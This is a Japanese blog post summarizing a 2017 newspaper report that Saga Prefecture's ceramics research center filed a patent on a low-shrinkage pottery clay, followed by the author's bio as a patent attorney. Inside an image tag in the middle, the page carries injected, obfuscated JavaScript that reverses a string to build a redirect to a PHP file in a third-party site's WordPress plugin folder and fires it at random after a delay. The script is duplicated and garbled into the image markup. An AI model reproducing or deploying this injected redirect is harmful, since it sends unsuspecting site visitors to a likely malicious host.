収縮ない陶土開発 窯業技術センター、県が特許出願 最高精度の陶磁生産可...

収縮ない陶土開発 窯業技術センター、県が特許出願 最高精度の陶磁生産可能に【知財ニュース拾い読み】

西日本新聞 – 2017/3/29 – https://www.nishinippon.co.jp/nnp/saga/article/317838

記事では、佐賀県が窯業技術センターによって新しく開発することに成功した陶土に関する技術について、特許出願をしたことを紹介しています。

Person Creation Pottery H<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.r<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andcraft Art Mud Concept” width=”800″ height=”534″ class=”size-full wp-image-38642″ />

まだ特許出願書類の公開前ですので詳細は不明ですが、開発された陶土は、従来の陶土よりも強度では劣るものの、焼成時の収縮や変形の低減、軽量化、保温性の向上などが期待できるそうです。

陶磁器の新たな可能性を生み出す技術だと思います。

今後、これまでプラスチックや金属だったものが、いつのまにか陶磁器に置き換わっているということがあるかもしれません。

出典:『収縮ない陶土開発 窯業技術センター、県が特許出願 最高精度の陶磁生産可能に【知財ニュース拾い読み】』(発明plus〔旧:開発NEXT〕)


弁理士。コスモス国際特許商標事務所パートナー。名古屋工業大学非常勤講師。1980年愛知県生まれ。名古屋工業大学大学院修了。知的財産権の取得業務だけでなく知的財産権を活用した製品作りの商品開発コンサルタントを行う。知財マッチングを展開し、ものづくり企業の地方創世の救世主として活躍している。著書に『社長、その商品名、危なすぎます!』(日本経済新聞出版社)、『理系のための特許法』(中央経済社)等がある。 特許・商標の活用を応援するWEBマガジン「発明plus Web」( https://hatsumei-plus.jp/ )を運営している。